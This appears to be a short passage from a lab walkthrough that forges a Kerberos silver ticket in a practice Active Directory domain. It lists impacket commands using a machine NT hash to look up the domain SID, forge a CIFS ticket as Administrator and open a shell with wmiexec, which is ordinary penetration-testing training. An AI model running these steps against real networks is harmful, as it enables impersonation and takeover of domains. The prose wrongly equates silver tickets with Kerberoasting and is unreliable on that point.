Silver ticket

Another way to get a shell is by creating a silver ticket :
Find the domain SID:

lookupsid.py -hashes ':4434b2874a45816ce75c971df2187ca6' 'NewYork.local'/'NYC$'@NYC.NewYork.local 0

Create the silver ticket:

Silver ticket attacks use this authentication to forge ticket granting service tickets. A forged service ticket is encrypted and enables access to resources for the specific service targeted by the silver ticket attack.

What a silver ticket attack shares with other types of ticket attacks is the abuse of the Kerberos vulnerability. This is called Kerberoasting, and it harvests password hashes for Active Directory user accounts by exploiting the Kerberos protocol. Kerberos is a network security protocol that authenticates service requests using secret-key cryptography. In addition to the silver ticket, the golden ticket and diamond ticket also attack this vulnerability.

ticketer.py -nthash '4434b2874a45816ce75c971df2187ca6' -domain-sid 'S-1-5-21-1209695003-1472128694-59720954' -domain NewYork.local -spn cifs/NYC.NewYork.local Administrator

And use it :

export KRB5CCNAME=/workspace/acl/Administrator.ccache
wmiexec.py -k -no-pass NewYork.local/administrator@NYC.NewYork.local

Ok the fun with NewYork.local domain is over, now let’s try some acl in the other domains.

Previousmachine account to administrator shell NextGPO abuse

Last updated 3 years ago